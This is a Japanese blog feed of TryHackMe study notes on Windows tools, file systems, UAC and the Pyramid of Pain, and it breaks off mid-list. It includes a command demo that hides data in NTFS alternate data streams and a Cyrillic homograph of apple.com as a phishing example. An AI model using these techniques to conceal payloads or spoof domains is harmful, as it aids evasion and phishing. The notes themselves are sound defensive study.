<p><strong>サービスとアプリケーション (Services and Applications)</strong><br>Windows が提供するサービスや追加アプリケーションの管理を行う機能。<br>サービスの開始・停止・自動起動の設定などを制御でき、システムの安定運用やトラブルシューティングに役立つ。<br><br>サービス (Services)<br>Windowsやアプリケーションのサービスを一覧し、開始・停止・再起動を制御。プロパティの表示なども可能。<br><br>WMIコントロール (WMI Control)<br>Windows Management Instrumentation の設定やセキュリティ構成を管理。<br><br>Routing and Remote Access (ルーティングとリモートアクセス)<br>ルーティング機能とリモートアクセス機能を提供。</p>



<h3 class="wp-block-heading">システム情報</h3>



<h4 class="wp-block-heading">システム情報 (msinfo32.exe)</h4>



<p>システム情報ツールは、Windowsに標準搭載されている診断ユーティリティ。<br>PCのハードウェア構成・システム環境・ドライバー情報を一覧表示できる。</p>



<p><strong>概要</strong></p>



<p>実行ファイル名：msinfo32.exe<br>場所：<code>%systemroot%\system32\msinfo32.exe</code><br>目的：Windowsのハードウェア構成、システム環境、コンポーネント、ドライバーやサービスなどの詳細情報を一覧表示する。トラブルシューティングやシステム診断、サポートへの情報提供に利用する。</p>



<p><strong>主な機能</strong></p>



<p>・システムの概要表示 (System Summary)<br>OSのバージョン、ビルド番号、シリアル番号、BIOSバージョン、起動モード（UEFI / Legacy）など。<br><br>・ハードウェア情報 (Hardware Resources)<br>CPU、メモリ、マザーボード、BIOS、ストレージ構成など。<br><br>・コンポーネント (Components)<br>ディスプレイ、サウンド、ネットワークアダプタなどの詳細情報。<br><br>・ソフトウェア環境 (Software Environment)<br>実行中のタスク、サービス、ドライバー、環境変数など。</p>



<h3 class="wp-block-heading">リソースモニター</h3>



<h4 class="wp-block-heading"><strong>リソースモニター (resmon.exe)</strong></h4>



<p>リソースモニターは、Windowsに標準搭載されているリソース監視ユーティリティ。<br>CPU、メモリ、ディスク、ネットワークの使用状況をリアルタイムで確認でき、パフォーマンス問題の解析や不正プロセスの調査に役立つ。</p>



<p><strong>概要</strong></p>



<p>実行ファイル名：resmon.exe<br>場所：<code>%systemroot%\System32\resmon.exe</code><br>目的：Windowsのリソース使用状況 (Resource Usage) をリアルタイムで監視するツール。CPU、メモリ、ディスク、ネットワークの使用状況を詳細に確認でき、パフォーマンスの問題解析 (Performance Troubleshooting) や負荷調査 (Load Analysis)、不正なプロセスやサービスの特定に利用される。</p>



<p><strong>主な機能</strong></p>



<p>概要 (Overview)<br>CPU、メモリ、ディスク、ネットワークの使用状況をまとめて表示。全体のリソース消費を一目で把握できる。<br><br>CPU (Processor)<br>実行中プロセスごとのCPU使用率、スレッド<sup data-fn="7af62359-3a48-4536-9e75-1a57ac497a53" class="fn"><a href="#7af62359-3a48-4536-9e75-1a57ac497a53" id="7af62359-3a48-4536-9e75-1a57ac497a53-link">1</a></sup>、ハンドル数<sup data-fn="1408ef5a-cff4-42cb-8935-6912d77194e8" class="fn"><a href="#1408ef5a-cff4-42cb-8935-6912d77194e8" id="1408ef5a-cff4-42cb-8935-6912d77194e8-link">2</a></sup>を表示。高負荷プロセスの特定に利用。<br><br>メモリ (Memory)<br>プロセスごとのメモリ使用量、コミット済み領域<sup data-fn="86cf1e75-a287-43b5-bff9-36c87860ecc5" class="fn"><a href="#86cf1e75-a287-43b5-bff9-36c87860ecc5" id="86cf1e75-a287-43b5-bff9-36c87860ecc5-link">3</a></sup>、ハードフォールト数<sup data-fn="8efae911-76f3-4132-a6e3-997ad970871e" class="fn"><a href="#8efae911-76f3-4132-a6e3-997ad970871e" id="8efae911-76f3-4132-a6e3-997ad970871e-link">4</a></sup>などを表示。メモリリークや不足の調査に役立つ。<br><br>ディスク (Disk)<br>プロセスやファイルごとのディスクI/Oを表示。アクセスが集中しているファイルやボトルネックを特定できる。<br><br>ネットワーク (Network)<br>プロセスごとの送受信データ量、接続先IPアドレスやポート番号を表示。不審な通信の調査に役立つ。</p>


<ol class="wp-block-footnotes"><li id="7af62359-3a48-4536-9e75-1a57ac497a53">プロセスの中で実際に処理を実行する最小単位。 <a href="#7af62359-3a48-4536-9e75-1a57ac497a53-link" aria-label="脚注参照1にジャンプ">↩︎</a></li><li id="1408ef5a-cff4-42cb-8935-6912d77194e8">Windowsが内部的に使う「番号札」のようなもの。 <a href="#1408ef5a-cff4-42cb-8935-6912d77194e8-link" aria-label="脚注参照2にジャンプ">↩︎</a></li><li id="86cf1e75-a287-43b5-bff9-36c87860ecc5">アプリが確保しているメモリ量。 <a href="#86cf1e75-a287-43b5-bff9-36c87860ecc5-link" aria-label="脚注参照3にジャンプ">↩︎</a></li><li id="8efae911-76f3-4132-a6e3-997ad970871e">足りないメモリをディスクから引っ張ってきた回数。 <a href="#8efae911-76f3-4132-a6e3-997ad970871e-link" aria-label="脚注参照4にジャンプ">↩︎</a></li></ol>


<h3 class="wp-block-heading">レジストリエディター</h3>



<p>レジストリエディターは、Windowsに標準搭載されているレジストリ管理ユーティリティ。<br>Windowsの構成情報（ユーザー設定、アプリケーション、ハードウェア情報など）が保存されているレジストリデータベースを表示・編集できる。<br>高度な設定変更やトラブルシューティングに役立つが、誤操作はシステム障害につながるため注意が必要。</p>



<p><strong>概要</strong></p>



<p><strong>実行ファイル名</strong>：regedit.exe<br><strong>場所</strong>：<code>%systemroot%\system32\regedit.exe</code><br><strong>目的</strong>：Windows の構成情報を保存している「レジストリ」を表示・編集するための標準ツール。</p>



<p><strong>レジストリとは</strong></p>



<p>Windowsレジストリは、OSやアプリケーション、ハードウェアの設定情報を集中管理するデータベース。</p>



<p>各ユーザーのプロフィール（デスクトップ設定やアプリの個別設定）<br>レジストリキー：HKEY_CURRENT_USER<br>コンピューターにインストールされているアプリケーションと関連情報<br>レジストリキー：HKEY_LOCAL_MACHINE\SOFTWARE<br>フォルダやアプリケーションアイコンのプロパティ設定（拡張子の関連付けなど）<br>レジストリキー：HKEY_CLASSES_ROOT<br>システムに存在するハードウェア（ドライバ・デバイス構成）<br>レジストリキー：HKEY_LOCAL_MACHINE\SYSTEM<br>現在のハードウェア構成（起動時のディスプレイやデバイス設定）<br>レジストリキー：HKEY_CURRENT_CONFIG<br>PC上の全ユーザーのプロフィール情報<br>レジストリキー：HKEY_USERS</p>



<p>簡単に言うと、Windowsの設計図や設定ファイルの集まり。</p>



<p>具体例<br>Windowsのレジストリエディターでユーザーごとのデスクトップ設定を表している部分。</p>



<p>ハイブ (Hive)：<code>HKEY_CURRENT_USER</code><br>　→ 現在ログインしているユーザーの設定を格納する領域。<br>キー (Key)：<code>Control Panel\Desktop</code><br>　→ デスクトップの表示や挙動に関する設定が入っている。<br>値 (Value)：<code>Wallpaper</code><br>　→ 壁紙として使用している画像ファイルのパス（場所）が保存されている。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="742" height="508" src="https://cybermemo.blog/wp-content/uploads/2025/09/レジストリ-1.png" alt="レジストリのWallpaperキー設定例" class="wp-image-267" style="width:562px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/09/レジストリ-1.png 742w, https://cybermemo.blog/wp-content/uploads/2025/09/レジストリ-1-300x205.png 300w" sizes="(max-width: 742px) 100vw, 742px" /></figure>



<figure class="wp-block-image size-full"><img decoding="async" width="372" height="162" src="https://cybermemo.blog/wp-content/uploads/2025/09/レジストリ2-1.png" alt="レジストリのWallpaperキー設定例" class="wp-image-269" srcset="https://cybermemo.blog/wp-content/uploads/2025/09/レジストリ2-1.png 372w, https://cybermemo.blog/wp-content/uploads/2025/09/レジストリ2-1-300x131.png 300w" sizes="(max-width: 372px) 100vw, 372px" /></figure>



<p><strong>注意点とセキュリティ</strong></p>



<p>レジストリはシステムの中枢なので、誤って編集するとWindowsが起動不能になるリスクがある。<br>管理者権限（UAC承認）が必要で、通常ユーザーは編集できない。<br>マルウェアは持続化のためにレジストリを悪用することが多いため、セキュリティの観点からも監査対象になる。</p>
]]></content:encoded>
					
					<wfw:commentRss>https://cybermemo.blog/tryhackme-windows-fundamentals-2/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>TryHackMe Windows Fundamentals 1 — 学習メモ</title>
		<link>https://cybermemo.blog/tryhackme-windows-fundamentals-1</link>
					<comments>https://cybermemo.blog/tryhackme-windows-fundamentals-1#respond</comments>
		
		<dc:creator><![CDATA[miyuki]]></dc:creator>
		<pubDate>Sat, 27 Sep 2025 04:21:37 +0000</pubDate>
				<category><![CDATA[TryHackMe]]></category>
		<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://cybermemo.blog/?p=233</guid>

					<description><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>はじめに Windows Fundamentals 1 の備忘録。本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。 Windows Fundamentals 1 ファイルシステム FAT（F [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>
<h2 class="wp-block-heading">はじめに</h2>



<p>Windows Fundamentals 1 の備忘録。<br>本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">TryHackMe</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://tryhackme-images.s3.amazonaws.com/room-icons/presec-room-image14.png" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://tryhackme.com/room/windowsfundamentals1xbx" target="_blank" rel="noopener noreferrer">Windows Fundamentals 1</a>
						<span class="p-blogCard__excerpt">In part 1 of the Windows Fundamentals module, we&#8217;ll start our journey learning about the Windows desktop, the NTFS file system, UAC, the Control Panel, and more&#8230;</span>					</div>
				</div>
			</div>
		</div>


<h2 class="wp-block-heading">Windows Fundamentals 1</h2>



<h3 class="wp-block-heading">ファイルシステム</h3>



<h4 class="wp-block-heading">FAT（File Allocation Table）</h4>



<p>登場時期：1977年（MS-DOS時代から利用）<br>種類：FAT12 → FAT16 → FAT32 と進化<br>特徴：<br>シンプルで古いシステムでも互換性が高い。<br>小型ストレージ（USBメモリ、SDカード）で今も利用される。<br>制限：<br>FAT32の場合、1ファイルあたり 最大4GB まで。<br>パーティションサイズは最大2TB程度まで。<br>セキュリティ機能なし（アクセス制御や暗号化は不可）。</p>



<h4 class="wp-block-heading">HPFS（High Performance File System）</h4>



<p>登場時期：1989年ごろ、OS/2用にIBMとMicrosoftが共同開発。<br>特徴：<br>FATの限界を克服するために開発された。<br>長いファイル名（255文字）をサポート。<br>ファイル断片化が少なく、パフォーマンスが良い。<br>制限：<br>Windows NT ではサポートされていたが、Windows 2000以降では非推奨。<br>現在のWindowsでは実質使われていない。</p>



<h4 class="wp-block-heading">NTFS（New Technology File System）</h4>



<p>登場時期: Windows NT（1993年）以降で標準採用。<br>特徴:<br>大容量ディスク対応（数TB〜数百TBまでOK）。<br>セキュリティ機能:<br>アクセス制御リスト（ACL）によるユーザーごとのアクセス権管理。<br>暗号化（EFS：Encrypting File System）。<br>圧縮機能。<br>ジャーナリング（ログ）機能があり、クラッシュしてもデータ復旧しやすい。<br>Windowsのシステムドライブ（C:）は通常 NTFS。</p>



<p><strong>NTFSのアクセス権</strong></p>



<p>Full control（フルコントロール）：<br>すべての操作（削除・権限変更含む）<br>Modify（変更）：<br>読み取り + 書き込み + 実行 + 削除<br>Read &amp; Execute（読み取りと実行）：<br>読み取り + 実行<br>List folder contents（フォルダの内容を一覧表示する）：<br>フォルダー単位の権限で、ファイル名一覧の参照やサブフォルダの辿りを許可する。ただしファイルの内容を読むには Read権限が必要。<br>Read（読み取り）：<br>ファイル閲覧<br>Write（書き込み）：<br>ファイルの作成・変更<br>Special permissions（特殊なアクセス許可）：<br>細かくカスタマイズされたアクセス権</p>



<p><strong>代替データストリーム（ADS）</strong></p>



<p>代替データストリーム（ADS）は、NTFSファイルシステムの機能で、ファイルに追加の隠しデータを保存できる仕組み。セキュリティ上は、攻撃者に悪用される可能性があるため注意が必要。<br>通常のファイルは「メインデータストリーム（:$DATA）」を持つが、ADSを使うと、同じファイル名の下に隠れた追加データを保存できる。<br><br>例えば、example.txt というテキストファイルがあるとした場合。</p>



<pre class="wp-block-code"><code># example.txtを作成
echo Hello &gt; example.txt

# 代替データストリームを追加
cmd /c "echo Secret &gt; example.txt:hidden"

# ファイル本体の内容を確認
Get-Content .\example.txt
# =&gt; Hello

# 特定ストリームの内容を確認
Get-Content .\example.txt -Stream hidden
# =&gt; Secret

# ファイルに含まれる全ストリームを列挙
Get-Item .\example.txt -Stream *

PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Downloads\example.txt::$DATA
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Downloads
PSChildName   : example.txt::$DATA
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\Administrator\Downloads\example.txt
Stream        : :$DATA
Length        : 16

PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Downloads\example.txt:hidden
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Downloads
PSChildName   : example.txt:hidden
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\Administrator\Downloads\example.txt
Stream        : hidden
Length        : 9</code></pre>



<p>example.txt → 通常の内容は「Hello」<br>example.txt:hidden → 隠しストリームに「Secret」が保存される<br>表面上のファイルサイズは「Hello」の分しか表示されず、「Secret」が隠れていることは分からない。</p>



<h3 class="wp-block-heading">Windows\System32 フォルダ</h3>



<p>Windowsオペレーティングシステムが含まれるフォルダー。</p>



<h4 class="wp-block-heading"><strong>何が入っているか（要約）</strong></h4>



<p>実行ファイル (.exe)：cmd.exe、taskmgr.exe、regedit.exe など、Windows の基本ユーティリティ。<br>ライブラリ (.dll)：システムAPIやサービスが依存する共有ライブラリ群。<br>ドライバやサポートファイル：デバイス制御やカーネル操作に必要なファイル。<br>コマンドラインツール：ipconfig.exe、sfc.exe、sc.exe などトラブルシュート用ツール。<br>リソース・ロケール・設定ファイル：言語ファイルやリソースが入る場合あり。</p>



<h4 class="wp-block-heading"><strong>なぜ重要なのか</strong></h4>



<p>Windowsのコア機能（起動、ログオン、デバイス管理、ネットワーク、セキュリティなど）のほとんどがこれらのファイルに依存している。<br>ここを壊すとシステムが起動しなくなったり、機能が失われたりする。</p>



<h4 class="wp-block-heading"><strong>64-bit Windowsでよく混乱すること</strong></h4>



<p>System32 = 64-bitバイナリ（64ビットWindows上）<br>SysWOW64 = 32-bitバイナリ（WOW64互換サブシステム用）<br>→名前だけ見ると逆に見えるので要注意。32-bitプロセスからアクセスすると自動でリダイレクトされる（ファイルシステムリダイレクション）。</p>



<h4 class="wp-block-heading"><strong>権限と保護</strong></h4>



<p>多くのファイルはTrustedInstaller（SYSTEM や TrustedInstaller 所有）に所有されており、削除や上書きには管理者権限＋追加操作が必要。<br>UAC（管理者承認） が働くので、通常ユーザーは書き込み不可。<br>重要：安易にファイルを削除・置換するとシステムが不安定になり、最悪起動不能になる。</p>



<h4 class="wp-block-heading"><strong>セキュリティ観点</strong></h4>



<p>マルウェアはしばしば System32 にファイルを植え付けようとする（隠蔽や永続化のため）。<br>正規ツールと同名の偽ファイルを置く「DLLハイジャック」などの攻撃もある。<br>定期的に sfc /scannow や DISM で整合性チェックを行うのが推奨。<br>※sfcやDISMを実行する際は、よく調べて自己責任で実行をすること。一部環境では非推奨なこともあり。</p>



<h3 class="wp-block-heading">ユーザーアカウント、プロファイル、権限</h3>



<h4 class="wp-block-heading"><strong>lusrmgr.msc</strong></h4>



<p>「ローカルユーザーとグループ (Local Users and Groups) 管理ツール」 を開くための管理コンソール。<br>Windows Home エディションでは利用できず、Pro/Enterprise/Education のみ。<br>ファイルの場所: <code>C:\Windows\System32\lusrmgr.msc</code></p>



<h4 class="wp-block-heading"><strong>できること</strong></h4>



<p>・ユーザー管理<br>ローカルユーザーアカウントの作成・削除<br>パスワードの設定・リセット<br>アカウントの有効化/無効化<br>アカウントのプロパティ（ログオンスクリプト、ホームフォルダなど）の編集</p>



<p>・グループ管理<br>ローカルグループの作成・削除<br>グループにユーザーを追加/削除<br>標準のグループ（Administrators, Users, Guests など）のメンバー管理</p>



<h3 class="wp-block-heading">ユーザーアカウント制御（UAC）</h3>



<p>UAC（User Account Control）とはアプリケーションやプロセスが「管理者権限での操作」を実行しようとしたときに確認を求め、不正なプログラムによるシステム変更を防ぐ仕組み。</p>



<h4 class="wp-block-heading"><strong>仕組み</strong></h4>



<p>・通常ログイン時<br>管理者ユーザーでも、普段は「標準ユーザー権限」でアプリを動かす。<br>（＝常にフル権限で動かさないことで被害を最小化）</p>



<p>・アプリが管理者権限を要求したとき<br>画面が暗転し、「このアプリがデバイスに変更を加えることを許可しますか？」と確認。<br>→ ユーザーが「はい」を選択すれば昇格して実行。</p>



<p>・標準ユーザーのアカウントの場合<br>UAC ダイアログが出たとき、管理者のユーザー名とパスワードを入力しないと許可されない。</p>



<h4 class="wp-block-heading"><strong>具体的な例</strong></h4>



<p>インストーラーを実行するとき<br>レジストリを変更するとき<br>System32などシステムフォルダにファイルをコピーするとき</p>



<h4 class="wp-block-heading"><strong>設定</strong></h4>



<p>コントロールパネル → ユーザーアカウント → ユーザーアカウント制御設定の変更<br>スライダーでレベル調整できる（常に通知する～通知しない）。<br>既定値は「アプリがコンピューターに変更を加えようとする場合のみ通知」。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="730" height="540" src="https://cybermemo.blog/wp-content/uploads/2025/09/ユーザーアカウント制御設定の変更.png" alt="ユーザーアカウント制御設定の変更" class="wp-image-247" style="width:544px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/09/ユーザーアカウント制御設定の変更.png 730w, https://cybermemo.blog/wp-content/uploads/2025/09/ユーザーアカウント制御設定の変更-300x222.png 300w" sizes="(max-width: 730px) 100vw, 730px" /></figure>



<h3 class="wp-block-heading">タスクマネージャー</h3>



<p>Windowsに標準搭載されているシステム管理ツール。<br>主にプロセス（アプリやサービスの実行状況）やリソース使用状況 を監視・管理するために使われる。<br>セキュリティや運用管理の観点では、不審なプロセスの確認・停止、パフォーマンス監視、ユーザーセッション管理に役立つ。</p>



<h4 class="wp-block-heading"><strong>主な機能（タブごと）</strong></h4>



<p>プロセス (Processes)<br>実行中のアプリ、バックグラウンドプロセス、Windows サービスが一覧表示。<br>CPU、メモリ、ディスク、ネットワークの使用率を確認できる。<br>不審なプログラムが動作していないかの確認に使う。</p>



<p>パフォーマンス (Performance)<br>CPU、メモリ、ディスク、ネットワーク、GPU などのリソース利用状況をグラフ表示。<br>リアルタイムで負荷状況を把握できる。<br>障害対応やキャパシティ管理に役立つ。</p>



<p>アプリの履歴 (App history)<br>Windows ストアアプリのリソース使用履歴を表示。<br>ChatGPT曰く、モバイルや省電力管理に近い用途らしい。</p>



<p>スタートアップ (Startup)<br>Windows 起動時に自動実行されるプログラムを一覧表示。<br>有効/無効の切り替えが可能 → 不要な自動起動を止めてセキュリティ強化や高速化。</p>



<p>ユーザー (Users)<br>現在ログインしているユーザーと、そのセッションのリソース消費を表示。<br>不正アクセスや、誰が負荷をかけているかの調査に使える。</p>



<p>詳細 (Details)<br>実行中プロセスをより詳細に表示（PID, 状態, ユーザー名, 優先度など）。<br>高度なトラブルシューティングに利用。</p>



<p>サービス (Services)<br>Windows サービスを一覧表示（実行中か停止中か）。<br>サービスの開始・停止・再起動が可能。</p>



<h2 class="wp-block-heading">その他</h2>



<p>なぜかSplit Viewでターゲットマシンを使っていると、定期的に「Connecting to remote machine…」となり接続できなくなったため、kali linuxからRDP接続に切り替え。<br>kali linuxからRDP接続では安定していた。</p>



<p>RDPがインストールされていなかったため、インストールから接続までのコマンドを記載。</p>



<pre class="wp-block-code"><code># FreeRDPがインストールされているか確認
which xfreerdp3

# インストール
sudo apt update
sudo apt install freerdp3-x11 -y

# RDP接続（※パスワード指定は履歴に残るので注意）
xfreerdp3 /v:IPアドレス /u:'ユーザー名' /p:'パスワード'</code></pre>
]]></content:encoded>
					
					<wfw:commentRss>https://cybermemo.blog/tryhackme-windows-fundamentals-1/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>TryHackMe Pyramid of Pain — 学習メモ</title>
		<link>https://cybermemo.blog/tryhackme-pyramid-of-pain</link>
					<comments>https://cybermemo.blog/tryhackme-pyramid-of-pain#respond</comments>
		
		<dc:creator><![CDATA[miyuki]]></dc:creator>
		<pubDate>Tue, 23 Sep 2025 03:33:38 +0000</pubDate>
				<category><![CDATA[TryHackMe]]></category>
		<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[SOC]]></category>
		<guid isPermaLink="false">https://cybermemo.blog/?p=173</guid>

					<description><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>はじめに Pyramid of Painの備忘録。本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。 Pyramid of Pain Task&#160;1　Introduction Pyra [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>
<h2 class="wp-block-heading">はじめに</h2>



<p>Pyramid of Painの備忘録。<br>本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">TryHackMe</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://tryhackme-images.s3.amazonaws.com/room-icons/ec7948465f169b0a00f13fda2711c909.png" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://tryhackme.com/room/pyramidofpainax" target="_blank" rel="noopener noreferrer">Pyramid Of Pain </a>
						<span class="p-blogCard__excerpt">Learn what is the Pyramid of Pain and how to utilize this model to determine the level of difficulty it will cause for an adversary to change the indicators ass&#8230;</span>					</div>
				</div>
			</div>
		</div>


<h2 class="wp-block-heading">Pyramid of Pain</h2>



<h3 class="wp-block-heading">Task&nbsp;1　Introduction</h3>



<h4 class="wp-block-heading">Pyramid of Pain（ピラミッド・オブ・ペイン）</h4>



<p>サイバー脅威ハンティングやインシデント対応で使われる有名な概念図。<br>下から上にいくほど、攻撃者にとって回避が難しく、防御側にとって価値が高い指標。<br>IoCの種類ごとに攻撃者への“痛み”の度合いを示すモデル。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="1024" height="1024" src="https://cybermemo.blog/wp-content/uploads/2025/09/Pyramid-of-Pain-2.png" alt="Pyramid of Pain" class="wp-image-186" style="width:396px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/09/Pyramid-of-Pain-2.png 1024w, https://cybermemo.blog/wp-content/uploads/2025/09/Pyramid-of-Pain-2-300x300.png 300w, https://cybermemo.blog/wp-content/uploads/2025/09/Pyramid-of-Pain-2-150x150.png 150w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<ul class="wp-block-list">
<li>ハッシュ値（Hash Values）<br>マルウェアファイルのハッシュ（MD5/SHA1など）。<br>攻撃者はファイルを少し変更すればハッシュは簡単に変えられるため、防御効果は低い。<br><br></li>



<li>IPアドレス（IP Addresses）<br>攻撃元やC2サーバーのIP。<br>攻撃者はプロキシやVPNを変えればすぐ別のIPが使える。<br><br></li>



<li>ドメイン名（Domain Names）<br>マルウェア通信に使われるドメイン。<br>取得し直すのに多少コストがかかるが、比較的簡単に回避可能。<br><br></li>



<li>ネットワーク/ホストアーティファクト（Network/Host Artifacts）<br>特徴的な通信パターン、レジストリキー、ファイル名など。<br>攻撃者は修正できるが、調整には労力がかかる。<br><br></li>



<li>ツール（Tools）<br>攻撃に使うマルウェアやフレームワーク（例：Mimikatz、Cobalt Strike）。<br>独自に開発したツールを封じられると、再開発や入手に時間がかかるため痛手。<br><br></li>



<li>TTPs（Tactics, Techniques, and Procedures：戦術・技術・手順）<br>攻撃者の行動様式そのもの。MITRE ATT&amp;CKで定義されるような「どんな手口で侵入・横展開・窃取するか」という戦略的パターン。<br>ここを把握して防御すると、攻撃者は根本的に戦術を変えざるを得ないため、最も「痛い」。</li>
</ul>



<h3 class="wp-block-heading">Task&nbsp;2　Hash Values (Trivial)</h3>



<h4 class="wp-block-heading">ハッシュ検索ツール</h4>



<ul class="wp-block-list">
<li><a href="https://www.virustotal.com/gui/" data-type="link" data-id="https://www.virustotal.com/gui/">VIRUSTOTAL</a><br>世界中のセキュリティベンダーの検知結果を集約し、ハッシュ値を入力すると、そのファイルが既知のマルウェアかどうか即座に確認できる。<br><br></li>



<li><a href="https://metadefender.com/" data-type="link" data-id="https://metadefender.com/">Metadefender Cloud &#8211; OPSWAT</a><br>マルチスキャンエンジンを利用し、ファイルの安全性や改ざん有無を検証できる。</li>
</ul>



<h4 class="wp-block-heading">セキュリティ研究レポート</h4>



<ul class="wp-block-list">
<li><a href="https://thedfirreport.com/" data-type="link" data-id="https://thedfirreport.com/">The DFIR Report</a><br>実際の攻撃事例に基づき、どのようなマルウェアがどの環境で使われたのかを詳細に解説。<br><br></li>



<li><a href="https://www.trellix.com/blogs/research/" data-type="link" data-id="https://www.trellix.com/blogs/research/">Trellix Research</a><br>セキュリティベンダーによる最新の脅威動向や解析記事が公開されている。</li>
</ul>



<h3 class="wp-block-heading">Task&nbsp;3　IP Address (Easy)</h3>



<ul class="wp-block-list">
<li>Fast Flux（ファストフラックス）<br>サイバー攻撃者がDNSを悪用して、自分たちのサーバ（フィッシングサイト、マルウェア配布サイト、C2サーバなど）を隠したり、耐障害性を高めたりする技術。</li>
</ul>



<h3 class="wp-block-heading">Task&nbsp;4　Domain Names (Simple)</h3>



<ul class="wp-block-list">
<li>Punycode（ピュニコード）攻撃<br>国際化ドメイン名（IDN）を悪用したフィッシング攻撃の一種。<br><br>・Punycodeとは<br>　ASCIIで記述できないUnicode文字（漢字やキリル文字など非ASCII文字）をASCII互換文字列に変換する方式。<br><br>・国際化ドメイン名（IDN）とは<br>　世界中の利用者向けに、漢字・ひらがな・キリル文字（ロシア語）、ギリシャ文字などをドメインに使えるようにした仕組みが 国際化ドメイン名（IDN）。<br><br>・攻撃の仕組み<br>　攻撃者は見た目が正規サイトと同じに見えるドメインを登録できる。<br>　<br>　例：<br>　本物： <code>apple.com</code><br>　偽サイト： <code>аррӏе.com</code> （キリル文字の「а」「р」「ӏ」「е」を使用）<br><br>　人間の目には「apple.com」に見えるが、実際は別のドメイン。<br>　ブラウザのアドレスバーでは apple.com と表示される場合もあり、ユーザーが気づきにくい。<br><br></li>



<li>URL短縮サービス<br>長いURL（Webアドレス）を短く変換してくれるサービス。<br>本当の遷移先が見えないため、フィッシング詐欺やマルウェア配布に悪用されることがある。<br>信頼できない短縮URLは直接クリックせず、「プレビュー機能」や展開ツールを使って遷移先を確認すると安全。<br><br>攻撃者は通常、以下のURL短縮サービスを利用して悪意のあるリンクを生成。<br>※Pyramid of Pain　Task&nbsp;4Domain Names (Simple)　より引用</li>
</ul>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<ul class="wp-block-list">
<li>bit.ly</li>



<li>goo.gl</li>



<li>ow.ly</li>



<li>s.id</li>



<li>smarturl.it</li>



<li>tiny.pl</li>



<li>tinyurl.com</li>



<li>x.co</li>
</ul>
</blockquote>



<p>　　・短縮URLサービスの公式プレビュー機能<br>　　　TinyURL → <code>https://<span class="swl-inline-color has-swl-deep-01-color">preview</span>.tinyurl.com/xxxx</code><br>　　　bit.ly<strong> </strong>→ 短縮URLの末尾に「+」を付けるとプレビュー画面が表示されます。<br>　　　例： <code>https://bit.ly/3xyzabc</code> に「+」をつけて <code>https://bit.ly/3xyzabc<span class="swl-inline-color has-swl-deep-01-color">+</span></code> <br>　　<br>　　・専用の展開サービス<br>　　　<a href="https://checkshorturl.com/" data-type="link" data-id="https://checkshorturl.com/%EF%BC%89">CheckShortURL</a><br>　　　<a href="https://unshorten.me/" data-type="link" data-id="https://unshorten.me/">Unshorten.me</a></p>



<ul class="wp-block-list">
<li>Any.run<br>マルウェア解析サンドボックスサービス。<br>後述のTask5にてAny.run解析レポートの内容について簡易的に紹介。</li>
</ul>



<h3 class="wp-block-heading">Task&nbsp;5　Host Artifacts (Annoying)</h3>



<ul class="wp-block-list">
